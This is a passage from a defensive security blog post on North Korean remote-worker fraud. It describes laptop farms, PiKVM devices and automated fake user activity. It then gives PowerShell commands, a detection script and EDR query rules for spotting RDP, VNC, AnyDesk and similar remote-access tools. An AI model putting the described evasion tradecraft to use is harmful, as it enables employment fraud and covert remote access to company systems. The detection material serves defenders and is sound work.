profiles on platforms like LinkedIn, Upwork, and GitHub. Their resumes typically show legitimate-sounding job histories and technical skills—Python development, mobile app engineering, blockchain smart contracts. Many even go as far as staging video calls with manipulated visuals or avatars to mask their real identities. Payment is often laundered through intermediaries, crypto wallets, or foreign bank accounts, making detection especially challenging.</p> <p>What’s particularly insidious is how these individuals embed themselves into the software supply chain. By working for startups and small tech firms—often in roles with elevated privileges—they gain indirect access to larger systems and source code. In some cases, they’ve attempted to get jobs at cryptocurrency exchanges or fintech companies, likely to feed Pyongyang’s appetite for digital assets used to circumvent international sanctions. The U.S. government estimates that these operations may generate millions of dollars annually, funding everything from weapons programs to surveillance infrastructure.</p> <p>This campaign differs from traditional cyber intrusion tactics by blending social engineering, fraud, and covert infrastructure. It’s not just one individual posing as a freelancer—it’s an entire backend operation involving laptop farms, VPN obfuscation, and remote-control systems like PiKVM to simulate legitimate activity across dozens of devices. The objective isn’t simply espionage; it’s financial survival for a regime increasingly isolated from the global economy. And as detection methods evolve, so too does the DPRK’s playbook—making it imperative for defenders to understand not just the actors, but the infrastructure that supports them – and tactics and indicators for discovering them.</p> <p></p> <h1 id="inside-the-infrastructure-laptop-farms-pikvms-and-remote-access-tools">Inside the Infrastructure: Laptop Farms, PiKVMs, and Remote Access Tools</h1> <p></p> <p>Beneath the surface of North Korea’s remote work campaign lies a dense and methodically engineered technical ecosystem. Far from a lone developer dialing in from a Pyongyang apartment, intelligence reports and private sector investigations have uncovered the widespread use of <strong>“laptop farms”</strong>—rooms filled with dozens of laptops or small-form-factor PCs connected to the same local area network. Each device is configured with a unique identity: its own OS install, user profile, browser history, or VPN tunnel. Typically these are commercial fleet machines shipped to the “remote worker”. From the outside, they appear to be different individuals logging in from different cities, or are multiple employees working across different organizations, when in reality they’re part of a centralized fraud operation controlled from afar.</p> <p><img src="https://github.com/user-attachments/assets/db25f9f7-ec65-491f-b5ef-6f7c38aa8ce8" alt="image" /></p> <p>To achieve remote access and simulate real user interaction, operators often leverage <strong>PiKVMs</strong>—open-source hardware devices that give full keyboard, video, and mouse control over a machine via the internet. PiKVMs are cheap, discreet, and highly effective. They or allow an operator to interact with a physical device as if they were sitting in front of it, complete with BIOS access and boot-time control. In the context of laptop farms, these devices act as remote control points, enabling one or two individuals to manage dozens of endpoints remotely, or allowing multiple users into the same LAN, without relying solely on traditional software like RDP or VNC, which might be more easily flagged by corporate detection tools.</p> <p>That’s not to say software-based control tools are off the table. <strong>Remote Desktop Protocol (RDP)</strong> and <strong>Virtual Network Computing (VNC)</strong> remain common, particularly in setups involving virtual machines or when the operator needs to simulate human activity over a longer period. Some setups go as far as implementing browser automation frameworks like <strong>Selenium</strong> or <strong>Puppeteer</strong> to fake user behavior—opening emails, browsing GitHub, even mimicking typing patterns. Combined with a good VPN provider and time zone matching, this can convincingly simulate a freelance developer logging into Jira from “Denver” or “Bangalore.”</p> <p>These infrastructures are often housed in nondescript locations: apartments, rented offices, or even shared co-working spaces, depending on the host country. What makes them especially hard to detect is that no malware needs to be deployed; the machines themselves aren’t compromised—they <em>are</em> the operation. Everything is designed to look benign at a glance, and ultimately the intent is indeed to do good work for consistent pay. The challenge for defenders is that traditional endpoint detection may not immediately raise flags—unless you’re specifically looking for the hallmarks of a laptop farm, like suspect ARP traffic, unusual USB device patterns, or eerily synchronized system activity across a cluster of machines.</p> <p></p> <p><img src="https://github.com/user-attachments/assets/86a0a988-a6dc-4972-8fac-b392ade42f08" alt="image" /></p> <p></p> <h1 id="beyond-the-interview-why-pre-onboarding-isnt-enough">Beyond the Interview: Why Pre-Onboarding Isn’t Enough</h1> <p></p> <p>Many organizations have begun to wise up to the risks posed by fraudulent remote workers, especially in sensitive sectors like software development, finance, and healthcare. Vetting strategies now often include deeper background checks, identity verification services, video interviews, and even geolocation validation to confirm where a candidate is physically located. Some firms go as far as requiring hardware key handoffs, in-person onboarding, or biometric authentication. These measures are good—and in some cases, essential—but they’re still not foolproof.</p> <p>The reality is that sophisticated actors have found ways to bypass even rigorous onboarding filters or are already on network . A candidate may pass every check with forged documents, borrowed credentials, or help from a third party. Once inside, they blend into the workforce like any other remote employee—slack messages, pull requests, commits, and meetings all proceed as expected. That’s why this post focuses not on keeping adversaries out, but on <strong>detecting them once they’re already in</strong>. Because by the time the fraud is discovered through payroll anomalies or performance issues, the infrastructure may have already served its purpose—or worse, left a backdoor behind.</p> <p>In the sections that follow, we’ll dive into technical strategies for spotting signs of laptop farms, remote-access tooling, and synchronized device clusters inside your environment. These detection methods lean heavily on endpoint telemetry, with a few network tricks, but it’s important to note that <strong>you’re probably not going to see much happening on the actual network you are defending</strong>. The focus here is what is happening on the individual machine, the remote LAN it is operating on, and if we can understand anything about that LAN while sitting outside of it. I’m also going to focus exclusively on Windows, obviously. There’s certainly space for Linux and Mac in this conversation, considering the likely outsized percentage of Developer roles falling to this scheme. That said, this draft has been sitting on my desktop for a week and I need to draw the line somewhere.</p> <p><img src="https://github.com/user-attachments/assets/7cd5eef4-54f9-48e2-8ee7-0321fd802cf3" alt="image" /></p> <p>So the overall intent of this post is to iterate through a few technical indicators worth drilling down into and how an analyst might detect them. I tried to generally split this into two “tracks” – first, a few local commands one could run using organic/built-in tools and commands (think Powershell, netstat, etc), then I run through a few different commercial tools that a SOC might have deployed.. keeping to the bigger ones, and within reason. The local stuff can also be used in conjunction with tools like Tanium Deploy or Crowdstrike Falcon’s Real-Time-Response (RTR) so – just attempting to slice this as many ways as I can. I wouldn’t call this the authoritative writeup of all things laptop farm but it’s as authoritative as I could muster given my own time/patience/knowledge. <br /></p> <h2 id="rdpvnc-and-software-detection">RDP/VNC and Software Detection</h2> <p></p> <p>I’ll start with some of the easier stuff that most fleet systems shouldn’t have enabled in the first place, or at least be tightly controlled. Applications like AnyDesk or enabled RDP are generally basic steps most SOCs should have detection logic in place already, but for posterity let’s run through a few. At first, I leaned towards not mentioning this stuff as it felt a bit basic and would end up cluttering the post – however, when I outlined this post out it felt incomplete without including this. If you’re familiar with detecting these or have them outright disallowed in your network, feel free to just skip through this portion.</p> <p></p> <h3 id="remote-desktop-protocol-rdp">Remote Desktop Protocol (RDP)</h3> <p></p> <p>RDP is Microsoft’s proprietary protocol for remote desktop access, built into Windows systems by default. It allows full desktop control over TCP port 3389 and is often the first choice for managing Windows machines remotely due to its native integration and performance. If you haven’t chased this down in a lab exercise or in a live SOC environment, there’s a few different ways you might catch this. Here’s some Powershell to start:</p> <h3 id="detection-techniques">Detection Techniques:</h3> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Check for RDP service status and active sessions_</span><span class="w"> </span><span class="n">Get-Service</span><span class="w"> </span><span class="nx">TermService</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">Status</span><span class="p">,</span><span class="w"> </span><span class="nx">StartType</span><span class="w"> </span></code></pre></div></div> <p><br /> <strong>What it does:</strong> <br /></p> <ul> <li>Queries the <strong>“Remote Desktop Services”</strong> Windows service (named TermService).</li> <li>Displays its <strong>Status</strong> (e.g., Running, Stopped) and <strong>StartType</strong> (e.g., Automatic, Manual, Disabled).</li> </ul> <p><br /> <strong>Why it’s useful:</strong></p> <p>This tells you whether RDP is enabled and running on the machine. If TermService is <strong>running and set to start automatically</strong>, the system is likely accepting incoming RDP connections. <br /></p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">qwinsta</span><span class="w"> </span><span class="nx">/server:localhost</span><span class="w"> </span></code></pre></div></div> <p><br /> <strong>What it does:</strong></p> <ul> <li>qwinsta (Query WINdows STAtion) lists all active <strong>Remote Desktop sessions</strong> on the local machine.</li> <li>Shows session ID, user name, session state (Active/Disconnected), and type (console/rdp-tcp).</li> </ul> <p><br /> <strong>Why it’s useful:</strong></p> <p></p> <p>This gives you <strong>live visibility</strong> into current or recently disconnected RDP sessions, which can help detect unauthorized or suspicious remote access.</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Monitor RDP-related processes and connections_</span><span class="w"> </span><span class="n">Get-Process</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="err">$</span><span class="n">\_.ProcessName</span><span class="w"> </span><span class="o">-like</span><span class="w"> </span><span class="s2">"\*rdp\*"</span><span class="w"> </span><span class="o">-or</span><span class="w"> </span><span class="err">$</span><span class="nx">\_.ProcessName</span><span class="w"> </span><span class="o">-like</span><span class="w"> </span><span class="s2">"\*mstsc\*"</span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p></p> <p><strong>What it does:</strong></p> <ul> <li>Lists running processes that include “rdp” or “mstsc” in the name.</li> <li>mstsc.exe is the <strong>Remote Desktop Client</strong> (used to initiate outbound RDP sessions).</li> </ul> <p></p> <p><strong>Why it’s useful:</strong></p> <p></p> <p>This helps detect if someone on the machine is <strong>actively running an RDP client</strong>, which could indicate outbound connections to other systems—especially useful in lateral movement detection.</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">netstat</span><span class="w"> </span><span class="nt">-an</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">findstr</span><span class="w"> </span><span class="p">:</span><span class="nx">3389</span><span class="w"> </span></code></pre></div></div> <p></p> <p><strong>What it does:</strong></p> <ul> <li>Uses netstat to list <strong>active network connections and listeners</strong>.</li> <li>findstr :3389 filters the results to only show connections involving <strong>port 3389</strong>, the default RDP port. <br /> <strong>Why it’s useful:</strong></li> </ul> <p>This quickly tells you if the system is:</p> <ul> <li><strong>Listening</strong> for inbound RDP connections (0.0.0.0:3389 or ::1:3389 in LISTENING state).</li> <li><strong>Actively connected</strong> to or from another IP on port 3389. <br /> Another key indicator is <strong>Windows Event IDs 4624/4625 with LogonType 10</strong>. 4624 is a successful logon event in Windows Security Logs, and 4625 is a failed one. Both include the field “Logon Type” which describes how the user logged in. A LogonType 10 specifically refers to <strong>RemoteInteractive</strong> logons (like RDP).</li> </ul> <p><br /> <strong>Why it’s useful:</strong></p> <ul> <li><strong>Logon Type 10</strong> is the canonical indicator of <strong>RDP usage</strong>, both successful and failed attempts.</li> <li>Monitoring for <strong>4624 with Logon Type 10</strong> shows <strong>when and who successfully connected via RDP</strong>.</li> <li>Monitoring for <strong>4625 with Logon Type 10</strong> surfaces <strong>failed RDP login attempts</strong>, which can be an early warning for <strong>brute force</strong> or unauthorized access attempts.</li> <li>You can also correlate these with: <ul> <li><strong>Source IP address</strong> (IpAddress field)</li> <li><strong>Username</strong> (TargetUserName)</li> <li><strong>Workstation name</strong></li> <li><strong>Logon Process Name</strong> (should typically be User32 or Advapi for RDP)</li> </ul> </li> </ul> <p><br /> Finally, here’s a bunch of queries for your preferred tool. This is specific to <em>inbound</em> RDP usage, or at least a LISTEN on 3389. These will need to be further customized if you’re looking for more generic RDP, lateral, or outbound stuff. <br /></p> <table> <thead> <tr> <th><strong>Tool</strong></th> <th><strong>Detection Logic / Rule / Location</strong></th> </tr> </thead> <tbody> <tr> <td><strong>Cortex XDR</strong></td> <td>dataset = xdr_data<br />| filter event_type = “network”<br />| filter action_network_remote_port = 3389<br />| filter action_network_inbound = true<br />| filter not(ip_network_contains(“10.0.0.0/8”, action_remote_ip)<br />or ip_network_contains(“172.16.0.0/12”, action_remote_ip)<br />or ip_network_contains(“192.168.0.0/16”, action_remote_ip))</td> </tr> <tr> <td><strong>CrowdStrike Falcon</strong></td> <td>#event_simpleName=/^(NetworkReceiveAcceptIP4|NetworkListenIP4)$/ event_platform=Win LocalPort=3389<br />Also searchable in Falcon console under <strong>“User Activity”</strong> telemetry.</td> </tr> <tr> <td><strong>Elastic Agent (KQL)</strong></td> <td>event.category:network and event.type:connection and destination.port:3389 and network.direction:inbound<br />and not (<br />source.ip:10.0.0.0/8 or<br />source.ip:172.16.0.0/12 or<br />source.ip:192.168.0.0/16<br />)</td> </tr> <tr> <td><strong>osquery</strong></td> <td>SELECT<br />pid,<br />protocol,<br />local_address,<br />local_port,<br />remote_address,<br />remote_port,<br />state<br />FROM process_open_sockets<br />WHERE remote_port = 3389 OR local_port = 3389;</td> </tr> <tr> <td><strong>SentinelOne XDR</strong></td> <td>( event.type == “Login” AND event.login.type in:matchcase( “REMOTE_INTERACTIVE”, “NETWORK”, “CACHED_REMOTE_INTERACTIVE”, “NETWORK_CLEAR_TEXT”, “NETWORK_CREDENTIALS” ) AND event.login.loginIsSuccessful == true )</td> </tr> <tr> <td><strong>Tenable Nessus</strong></td> <td>Detects exposed RDP (TCP 3389) as a potential vulnerability or misconfiguration. Look for plugin IDs like <strong>10940</strong> (Remote Desktop Protocol Service Detection) or <strong>5935</strong> (Windows RDP / Terminal Services Detection).</td> </tr> </tbody> </table> <p><br /></p> <h2 id="virtual-network-computing-vnc">Virtual Network Computing (VNC)</h2> <p></p> <p>VNC is a cross-platform remote desktop protocol that transmits keyboard, mouse, and screen data over a network. Unlike RDP, VNC works across different operating systems and typically uses ports 5900-5905, making it popular for mixed-environment laptop farms. Same premise here with the Powershell to start, except we’ll mix in some basic cmd as well:</p> <p></p> <h3 id="detection-techniques-1">Detection Techniques:</h3> <p></p> <pre><code class="language-cmd">tasklist | findstr /i "vnc x11vnc tightvnc realvnc tigervnc uvnc ultra" wmic process where "name like '%vnc%'" get name,processid,executablepath </code></pre> <p></p> <p><strong>What it does:</strong></p> <ul> <li> <p><strong><code class="language-plaintext highlighter-rouge">tasklist | findstr</code></strong>: Lists all running processes (`tasklist`) and filters (`findstr`) for common VNC-related process names (case-insensitive `/i`).</p> </li> <li> <p><strong><code class="language-plaintext highlighter-rouge">wmic process</code></strong>: Uses Windows Management Instrumentation (WMI) to find processes with “vnc” in their name and displays their name, PID, and full executable path.</p> </li> </ul> <p></p> <p><strong>Why it’s useful:</strong></p> <ul> <li> <p>Detects <strong>active VNC servers</strong> (e.g., TightVNC, UltraVNC, RealVNC).</p> </li> <li> <p>Helps identify <strong>unauthorized remote access tools</strong> running in memory.</p> </li> <li> <p>The `wmic` version gives <strong>more details</strong> (like exact executable location), useful for forensic analysis.</p> </li> </ul> <p><br /></p> <pre><code class="language-cmd">netstat -ano | findstr ":5900 :5901 :5902 :5903 :5904 :5905" # And in PowerShell: Get-NetTCPConnection -State Listen | Where-Object { $\_.LocalPort -ge 5900 -and $\_.LocalPort -le 5905 } </code></pre> <p><br /> <strong>What it does:</strong></p> <ul> <li> <p><strong><code class="language-plaintext highlighter-rouge">netstat -ano</code></strong>: Lists all active network connections (`-a`), shows ports numerically (`-n`), and includes owning process IDs (`-o`).</p> </li> <li> <p>`findstr` filters for <strong>default VNC ports (5900-5905)</strong>.</p> </li> <li> <p><strong>PowerShell version</strong>: Uses `Get-NetTCPConnection` to check for listening ports in the VNC range (5900-5905).</p> </li> </ul> <p><br /> <strong>Why it’s useful:</strong></p> <ul> <li> <p>Confirms if <strong>VNC is actively listening</strong> for incoming connections.</p> </li> <li> <p>Helps detect <strong>hidden VNC servers</strong> (if they use standard ports).</p> </li> <li> <p>The `-o` flag in `netstat` links ports to <strong>Process IDs (PIDs)</strong>, helping trace back to the executable.</p> </li> </ul> <p><br /></p> <pre><code class="language-cmd">dir /s /b C:\Users\*\.vnc dir /s /b C:\Users\*\vnc.ini dir /s /b C:\Users\*\ultravnc.ini dir /s /b "C:\Program Files\*vnc*" dir /s /b "C:\Program Files (x86)\*vnc*" # And in PowerShell: Get-ChildItem -Path C:\Users -Recurse -Force -Include "*vnc*" -ErrorAction SilentlyContinue Get-ChildItem -Path "C:\Program Files*" -Recurse -Force -Include "*vnc*" -ErrorAction SilentlyContinue </code></pre> <p><br /> <strong>What it does:</strong></p> <ul> <li> <p>Searches for <strong>VNC config files</strong> (`.vnc`, `vnc.ini`, `ultravnc.ini`) in user profiles (`C:\Users`).</p> </li> <li> <p>Looks for <strong>VNC installation directories</strong> in `Program Files`.</p> </li> <li> <p><strong>PowerShell version</strong> does the same but with better error handling (`-ErrorAction SilentlyContinue`).</p> </li> </ul> <p><br /> <strong>Why it’s useful:</strong></p> <ul> <li> <p>Finds <strong>stored VNC passwords</strong> (some VNC servers store passwords in plaintext or weakly encrypted).</p> </li> <li> <p>Helps identify <strong>old/uninstalled VNC software</strong> (leftover files may contain sensitive data).</p> </li> <li> <p>Useful to see if VNC was ever installed.</p> </li> </ul> <p><br /></p> <h2 id="anydesk-teamviewer-pick-your-preferred-exe">AnyDesk, TeamViewer, pick your preferred EXE</h2> <p><br /></p> <p>AnyDesk is a commercial remote desktop application known for its ease of deployment and ability to traverse NAT/firewall restrictions. It’s particularly favored in laptop farm operations because it requires minimal configuration and can establish connections through relay servers without complex network setup.</p> <p>TeamViewer is a widely-used commercial remote access solution that supports cross-platform connections and includes features like file transfer and VPN functionality. Its commercial legitimacy makes it attractive for laptop farm operators who want to appear professional, though it also creates extensive logs that can reveal suspicious usage patterns.</p> <p>At this point, you might be thinking that there’s any number of applications with proprietary protocols you could go after. <strong>ScreenConnect, Splashtop, RustDesk, and others</strong>—each with its own trade-offs in stealth, performance, and forensic footprint. If you think that kind of sucks and maybe your shop should just block all this stuff – or any unauthorized app install at ALL – you’d be correct. That said, assuming this stuff might be allowed or sneak on to a system, let’s try to knock all this out in some consolidated queries.</p> <p>The below takes the prior RDP and VNC indicators and throws in a couple more well-known Remote Access tools into a consolidated Powershell script. If you suspect others in your environment, it’s pretty simple to add in string searches or other keywords within this script. After that is another table of the fancy tools that I will consolidate as much of the prior as possible as well. Warning – this will end up looking hilariously messy. For that reason (as you may have noticed in the prior RDP section) and in the interest of space, these will output as raw results rather than formatted tables. You’re probably better off outputting these results as formatted tables or limiting to certain fields. Don’t say I didn’t warn you.</p> <p><br /></p> <h3 id="detection-techniques-2">Detection Techniques:</h3> <p><br /></p> <pre><code class="language-Powershell"># Consolidated Remote Access Tool Detection Script # Checks for VNC, AnyDesk, TeamViewer, ScreenConnect, RDP, and others # 1. Detect Running Processes &amp; Services Write-Host "`n[!] Checking for running remote access processes..." -ForegroundColor Yellow $remoteTools = @( "*vnc*", "*anydesk*", "*teamviewer*", "*screenconnect*", "*connectwise*", "*splashtop*", "*logmein*", "*gotomypc*", "*radmin*", "*ultraviewer*", "*rustdesk*" ) Get-Process | Where-Object { $_.Name -like ($remoteTools -join " -or Name -like ") } | Select-Object Name, Id, Path Get-Service | Where-Object { $_.DisplayName -like ($remoteTools -join " -or DisplayName -like ") } | Select-Object Name, DisplayName, Status # 2. Check Listening Ports (VNC, RDP, etc.) Write-Host "`n[!] Checking for common remote access ports..." -ForegroundColor Yellow $remotePorts = @(5900, 5901, 5902, 3389, 5938, 6568, 7070, 8172) Get-NetTCPConnection -State Listen | Where-Object { $remotePorts -contains $_.LocalPort } | Select-Object LocalAddress, LocalPort, OwningProcess | ForEach-Object { $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue [PSCustomObject]@{ Port = $_.LocalPort Process = $proc.Name PID = $_.OwningProcess Path = $proc.Path } } # 3. Check Registry for Installed Software Write-Host "`n[!] Checking registry for remote access tools..." -ForegroundColor Yellow $regPaths = @( "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*", "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" ) Get-ItemProperty $regPaths | Where-Object { $_.DisplayName -match "vnc|anydesk|teamviewer|screenconnect|connectwise|splashtop|logmein|radmin|ultraviewer|rustdesk" } | Select-Object DisplayName, InstallLocation # 4. Check Common Installation Directories Write-Host "`n[!] Scanning for installation files..." -ForegroundColor Yellow $searchPaths = @( "$env:ProgramFiles", "$env:ProgramFiles (x86)", "$env:APPDATA", "$env:LOCALAPPDATA" ) $searchTerms = @("*vnc*", "*anydesk*", "*teamviewer*", "*screenconnect*", "*connectwise*", "*splashtop*") foreach ($path in $searchPaths) { Get-ChildItem -Path $path -Recurse -Force -Include $searchTerms -ErrorAction SilentlyContinue | Select-Object FullName, LastWriteTime } # 5. Check for Log Files (TeamViewer, AnyDesk, etc.) Write-Host "`n[!] Checking for remote access log files..." -ForegroundColor Yellow $logFiles = @( "$env:ProgramFiles*\TeamViewer\TeamViewer*_Logfile.log", "$env:APPDATA\AnyDesk\*.trace", "$env:ProgramData\ScreenConnect\Logs\*.log" ) foreach ($log in $logFiles) { if (Test-Path $log) { Get-Content $log | Select-String -Pattern "Connection|established|session" -CaseSensitive:$false | Select-String -NotMatch -Pattern "disconnected" | Select-Object -First 5 } } # 6. Check RDP Configuration (Optional) Write-Host "`n[!] Checking RDP (Remote Desktop) Status..." -ForegroundColor Yellow Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -ErrorAction SilentlyContinue Get-NetFirewallRule -DisplayName "*Remote Desktop*" | Where-Object { $_.Enabled -eq "True" } | Select-Object DisplayName, Enabled </code></pre> <p><br /><br /></p> <table> <thead> <tr> <th><strong>Tool</strong></th> <th><strong>Detection Logic / Rule / Location</strong></th> </tr> </thead> <tbody> <tr> <td><strong>Cortex XDR</strong></td> <td>dataset = xdr_data<br />| filter<br />// Network connections to common remote access ports<br />(<br />action_network_remote_port in (3389, 5900, 5901, 5902, 5938, 6568, 7070, 8172)<br />and action_network_inbound = true<br />and not(<br />ip_network_contains(“10.0.0.0/8”, action_remote_ip) or<br />ip_network_contains(“172.16.0.0/12”, action_remote_ip) or<br />ip_network_contains(“192.168.0.0/16”, action_remote_ip)<br />)<br />)<br />or<br />// Process executions of remote access tools<br />(<br />event_type = “process”<br />and (<br />lowercase(actor_process_name) like “%vnc%” or<br />lowercase(actor_process_name) like “%anydesk%” or<br />lowercase(actor_process_name) like “%teamviewer%” or<br />lowercase(actor_process_name) like “%screenconnect%” or<br />lowercase(actor_process_name) like “%connectwise%” or<br />lowercase(actor_process_name) like “%splashtop%” or<br />lowercase(actor_process_name) like “%radmin%” or<br />lowercase(actor_process_name) like “%rustdesk%”<br />)<br />)<br />or<br />// File creations/modifications of config files<br />(<br />event_type = “file”<br />and (<br />lowercase(file_path) like “%\\anydesk\\%” or<br />lowercase(file_path) like “%\\teamviewer\\%” or<br />lowercase(file_path) like “%\\ultravnc.ini” or<br />lowercase(file_path) like “%\\vnc.ini” or<br />lowercase(file_path) like “%\\screenconnect\\%” or<br />lowercase(file_path) like “%\\splashtop\\%”<br />)<br />)</td> </tr> <tr> <td><strong>CrowdStrike Falcon</strong></td> <td>(<br /># 1. Network Connections (RDP/VNC/TeamViewer/AnyDesk)<br />(<br />event_simpleName=/^(NetworkReceiveAcceptIP4|NetworkListenIP4|RemoteIp4)$/<br />event_platform=”Win”<br />LocalPort IN (3389, 5900, 5901, 5902, 5938, 6568, 7070, 8172)<br />AND NOT ip_network_contains(LocalAddress_ip4, “10.0.0.0/8”)<br />AND NOT ip_network_contains(LocalAddress_ip4, “192.168.0.0/16”)<br />AND NOT ip_network_contains(LocalAddress_ip4, “172.16.0.0/12”)<br />)<br />OR<br /># 2. Process Executions<br />(<br />event_simpleName=”ProcessRollup2”<br />(<br />FileName IN (“vncserver.exe”, “winvnc.exe”, “tvnserver.exe”, “anydesk.exe”, “teamviewer.exe”, “screenconnect.exe”, “splashtop.exe”, “rustdesk.exe”)<br />OR FileName LIKE “%vnc%”<br />OR FileName LIKE “%anydesk%”<br />OR FileName LIKE “%teamviewer%”<br />)<br />)<br />OR<br /># 3. Service Creations<br />(<br />event_simpleName=”ServiceStarted”<br />(<br />ServiceFileName IN (“vncserver.exe”, “winvnc.exe”, “anydesk.exe”, “teamviewer_service.exe”)<br />OR ServiceName LIKE “%vnc%”<br />OR ServiceName LIKE “%anydesk%”<br />)<br />)<br />OR<br /># 4. File Modifications (Configs)<br />(<br />event_simpleName IN (“PeFileWritten”, “FileWritten”)<br />(<br />TargetFileName LIKE “%\\anydesk\\%.ini”<br />OR TargetFileName LIKE “%\\ultravnc.ini”<br />OR TargetFileName LIKE “%\\vnc\\%”<br />OR TargetFileName LIKE “%\\teamviewer\\%”<br />)<br />)<br />| eval Protocol=case(<br />LocalPort=3389, “RDP”,<br />LocalPort IN (5900, 5901, 5902), “VNC”,<br />LocalPort=5938, “TeamViewer”,<br />LocalPort=7070, “AnyDesk”,<br />LocalPort=8172, “ScreenConnect”,<br />1=1, “Other”<br />)</td> </tr> <tr> <td><strong>Elastic Agent</strong></td> <td>(<br />(event.type: (connection or start) and network.direction: “inbound” and destination.port: (3389 or 5900 or 5901 or 5902 or 5938 or 7070 or 8172) and<br />not source.ip: (“10.0.0.0/8” or “172.16.0.0/12” or “192.168.0.0/16”))<br />) or (<br />process.name: *vnc* or<br />process.name: *anydesk* or<br />service.name: *teamviewer* or<br />file.path: *\\screenconnect\\* or<br />registry.path: *\\rustdesk\\*<br />)</td> </tr> <tr> <td><strong>osquery</strong></td> <td>SELECT<br />‘network’ AS type,<br />p.pid,<br />p.name AS process,<br />pos.local_port,<br />pos.remote_address,<br />CASE<br />WHEN pos.local_port IN (5900,5901,5902) THEN ‘VNC’<br />WHEN pos.local_port = 3389 THEN ‘RDP’<br />WHEN pos.local_port = 5938 THEN ‘TeamViewer’<br />WHEN pos.local_port = 7070 THEN ‘AnyDesk’<br />ELSE ‘Other’<br />END AS tool<br />FROM process_open_sockets pos<br />JOIN processes p USING(pid)<br />WHERE pos.local_port IN (3389,5900,5901,5902,5938,7070,8172)<br />UNION ALL<br />SELECT<br />‘process’ AS type,<br />pid,<br />name AS process,<br />NULL AS local_port,<br />NULL AS remote_address,<br />CASE<br />WHEN name LIKE ‘%vnc%’ THEN ‘VNC’<br />WHEN name LIKE ‘%anydesk%’ THEN ‘AnyDesk’<br />WHEN name LIKE ‘%teamviewer%’ THEN ‘TeamViewer’<br />ELSE ‘Other’<br />END AS tool<br />FROM processes<br />WHERE name LIKE ‘%vnc%’ OR name LIKE ‘%anydesk%’ OR name LIKE ‘%teamviewer%’<br />UNION ALL<br />SELECT<br />‘service’ AS type,<br />NULL AS pid,<br />name AS process,<br />NULL AS local_port,<br />NULL AS remote_address,<br />‘Persistent’ AS tool<br />FROM services<br />WHERE name LIKE ‘%vnc%’ OR name LIKE ‘%anydesk%’;</td> </tr> <tr> <td><strong>SentinelOne XDR</strong></td> <td>(<br />// 1. All detection methods combined<br />(event.type == “Login” AND event.login.loginIsSuccessful AND<br />event.login.type in:matchcase(“REMOTE_INTERACTIVE”, “NETWORK*”, “CACHED*”))<br />OR<br />(event.type == “Process” AND event.process.name matches:wildcard(“*vnc*”, “*anydesk*”, “*teamviewer*”))<br />OR<br />(event.type == “Network” AND event.network.dstPort in:(3389, 5900, 5901, 5902, 5938, 7070, 8172) AND<br />NOT ip.inRange(event.network.remoteAddress, “10.0.0.0/8”, “172.16.0.0/12”, “192.168.0.0/16”))<br />OR<br />(event.type == “File” AND event.file.fullPath matches:wildcard(“*\\anydesk\\*”, “*\\vnc\\*”, “*ultravnc.ini”))<br />)</td> </tr> <tr> <td><strong>Tenable Nessus</strong></td> <td>So many plugins. Use the search function on the <a href="https://www.tenable.com/plugins/search">Plugin database</a>, but here’s a few quick ones.<br /><strong>10940</strong> Remote Desktop Protocol Service Detection<br /><strong>5935</strong> Windows RDP / Terminal Services Detection<br /><strong>189953</strong> AnyDesk Installed (Windows)<br /><strong>10342</strong> VNC Software Detection<br /><strong>6065</strong> VNC Client Detection<br /><strong>52715</strong> TeamViewer Version Detection<br /><strong>121245</strong> TeamViewer remote detection</td> </tr> </tbody> </table> <p><br /></p> <h2 id="a-quick-note-on-apache-guacamole-and-other-clientless-remote-access-stuff">A Quick Note on Apache Guacamole and other Clientless Remote Access Stuff</h2> <p><br /> <a href="https://guacamole.apache.org/">Apache Guacamole</a> is an open-source, clientless remote desktop gateway that allows users to securely access and control remote computers through a web browser. Supporting protocols like RDP, VNC, and SSH, it eliminates the need for specialized client software by delivering remote sessions entirely via HTML5. This makes it highly flexible and accessible from virtually any device with internet access, while centralizing remote access management and improving security by acting as a proxy between users and target systems.</p> <p>I’ve seen Guacamole as part of this scheme in the wild once or twice and have been asked about it in the context of remote worker schemes so I’ll briefly clarify here: Apache Guacamole can certainly be an indicator worth investigating. HOWEVER, it’s critical to understand that the target machine still requires an underlying RDP, VNC, or SSH connection. The difference is that the connection is routed through the Guacamole gateway rather than directly from the remote worker. Therefore, host-based indicators of remote access software will remain the same and are functionally unchanged for an analyst’s detection purposes—except for one important caveat, which I will cover later in the Network Technical Indicators section. <br /></p> <h1 id="hardware-detection">Hardware Detection</h1> <p><br /> Alright let’s get into some of the fun stuff and really more of the reason I started writing this up: some of the more clever ways to pull this off and what we can do about it…. While software-based remote access tools leave obvious traces in process lists and network connections, hardware-based solutions like PiKVM and TinyPilot present a more sophisticated challenge. These devices provide out-of-band management capabilities that operate independently of the target system’s operating system, making them significantly harder to detect through traditional endpoint monitoring. Briefly: <br /></p> <h2 id="pikvm-pi-based-keyboard-video-mouse">PiKVM (Pi-based Keyboard, Video, Mouse)</h2> <p><br /> PiKVM is an open-source hardware solution built on Raspberry Pi that provides complete KVM-over-IP functionality. It connects directly to a target machine’s HDMI, USB, and power ports, allowing full control including BIOS access, boot management, and pre-OS operations. In laptop farm scenarios, PiKVM devices enable operators to manage dozens of machines remotely without installing any software on the target systems. <br /></p> <h2 id="tinypilot">TinyPilot</h2> <p><br /> TinyPilot is a commercial KVM-over-IP solution similar to PiKVM but with a more polished interface and enterprise features. It provides browser-based remote control of target machines through direct hardware connections. TinyPilot devices are particularly attractive for laptop farm operations because they require no software installation and can operate even when the target system is powered off. <br /></p> <h2 id="detections">Detections</h2> <p><br /> These are, frankly, pretty tough to detect if sufficiently customized, namely because a user can customize the configuration to throw dummy values. That said, I’d say the current authoritative source on how to do that has 